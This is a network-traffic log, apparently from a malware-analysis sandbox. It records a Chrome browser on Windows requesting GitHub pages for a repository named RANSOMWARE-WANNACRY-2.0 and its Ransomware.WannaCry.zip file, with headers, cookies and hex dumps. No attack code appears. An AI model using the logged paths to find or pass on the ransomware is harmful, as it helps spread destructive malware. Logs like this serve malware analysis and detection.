                                                                                      2024-03-23 14:47:26 UTC954INData Raw: ff d8 ff db 00 84 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 28 00 28 03 01 22 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a
                                                                                      Data Ascii: $.' ",#(7),01444'9=82<.3422!!22222222222222222222222222222222222222222222222222(("}!1AQa"q2#BR$3br%&'()*


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      92192.168.2.1649798140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC1162OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: application/json
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      If-None-Match: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      2024-03-23 14:47:27 UTC523INHTTP/1.1 304 Not Modified
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:27 UTC2894INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      93192.168.2.1649799140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC858OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC507INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:27 UTC2912INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      94192.168.2.1649800140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC886OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC436INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:27 UTC2913INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      95192.168.2.1649801140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC890OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC513INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:27 UTC2936INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:27 UTC239INData Raw: 7b 22 73 68 6f 77 4c 69 63 65 6e 73 65 4d 65 74 61 22 3a 66 61 6c 73 65 2c 22 6c 69 63 65 6e 73 65 22 3a 6e 75 6c 6c 2c 22 6e 65 77 49 73 73 75 65 50 61 74 68 22 3a 22 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 69 73 73 75 65 73 2f 6e 65 77 22 2c 22 6e 65 77 44 69 73 63 75 73 73 69 6f 6e 50 61 74 68 22 3a 6e 75 6c 6c 2c 22 63 6f 64 65 6f 77 6e 65 72 49 6e 66 6f 22 3a 7b 22 63 6f 64 65 6f 77 6e 65 72 50 61 74 68 22 3a 6e 75 6c 6c 2c 22 6f 77 6e 65 64 42 79 43 75 72 72 65 6e 74 55 73 65 72 22 3a 6e 75 6c 6c 2c 22 6f 77 6e 65 72 73 46 6f 72 46 69 6c 65 22 3a 6e 75 6c 6c 2c 22 72 75 6c 65 46 6f 72 50 61 74 68 4c 69 6e 65 22 3a 6e 75 6c 6c 7d 7d
                                                                                      Data Ascii: {"showLicenseMeta":false,"license":null,"newIssuePath":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/issues/new","newDiscussionPath":null,"codeownerInfo":{"codeownerPath":null,"ownedByCurrentUser":null,"ownersForFile":null,"ruleForPathLine":null}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      96192.168.2.1649802140.82.114.214436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC793OUTPOST /github/collect HTTP/1.1
                                                                                      Host: collector.github.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 1050
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: same-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC1050OUTData Raw: 7b 22 63 6c 69 65 6e 74 5f 69 64 22 3a 22 31 33 35 38 37 38 36 30 38 37 2e 31 37 31 31 32 30 35 32 34 30 22 2c 22 70 61 67 65 5f 76 69 65 77 73 22 3a 5b 7b 22 70 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 22 2c 22 74 69 74 6c 65 22 3a 22 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 2f 52 61 6e 73 6f 6d 77 61 72 65 2e 57 61 6e 6e 61 43 72 79 2e 7a 69 70 20 61 74 20 6d 61 73 74 65 72 20 c2 b7 20 63 68 72 6f 6e 6f 73 6d 69 6b 69 2f 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32
                                                                                      Data Ascii: {"client_id":"1358786087.1711205240","page_views":[{"page":"https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip","title":"RANSOMWARE-WANNACRY-2.0/Ransomware.WannaCry.zip at master chronosmiki/RANSOMWARE-WANNACRY-2
                                                                                      2024-03-23 14:47:27 UTC578INHTTP/1.1 204 No Content
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      access-control-allow-methods: POST,OPTIONS
                                                                                      access-control-allow-headers: Content-Type
                                                                                      access-control-allow-credentials: true
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: no-cache
                                                                                      X-Runtime: 0.002473
                                                                                      Strict-Transport-Security: max-age=631138519
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      x-download-options: noopen
                                                                                      x-permitted-cross-domain-policies: none
                                                                                      x-github-backend: Kubernetes
                                                                                      X-GitHub-Request-Id: 9186:81E2:2FCD12:779644:65FEEB7F
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      97192.168.2.1649803185.199.109.1334436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC375OUTGET /u/19915931?v=4&size=40 HTTP/1.1
                                                                                      Host: avatars.githubusercontent.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:27 UTC939INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 954
                                                                                      Cache-Control: max-age=300
                                                                                      Content-Security-Policy: default-src 'none'
                                                                                      Content-Type: image/jpeg
                                                                                      ETag: "71e07e961a6aff9041ee787b6b301e8559ffb9cbc59184fc55f4eb7dfc7847db"
                                                                                      Last-Modified: Wed, 10 May 2017 16:40:01 GMT
                                                                                      Strict-Transport-Security: max-age=31557600
                                                                                      timing-allow-origin: https://github.com
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: deny
                                                                                      x-github-tenant:
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-GitHub-Request-Id: 9E74:478D:B2CEC:DE2FC:65F51DCB
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Via: 1.1 varnish
                                                                                      X-Served-By: cache-ewr18121-EWR
                                                                                      X-Cache: HIT
                                                                                      X-Cache-Hits: 1
                                                                                      X-Timer: S1711205247.401179,VS0,VE1
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      X-Fastly-Request-ID: 37cb2a1a780ba9ec35b68cd81ed6d7e535998e3b
                                                                                      Expires: Sat, 23 Mar 2024 14:52:27 GMT
                                                                                      Source-Age: 642484
                                                                                      Vary: Authorization,Accept-Encoding
                                                                                      2024-03-23 14:47:27 UTC954INData Raw: ff d8 ff db 00 84 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 28 00 28 03 01 22 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a
                                                                                      Data Ascii: $.' ",#(7),01444'9=82<.3422!!22222222222222222222222222222222222222222222222222(("}!1AQa"q2#BR$3br%&'()*


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      98192.168.2.1649804140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC1162OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/refs?type=branch HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: application/json
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      If-None-Match: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      2024-03-23 14:47:27 UTC523INHTTP/1.1 304 Not Modified
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"8472f0ac1bd0bdea4efec9eccc6c7961"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:27 UTC2893INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
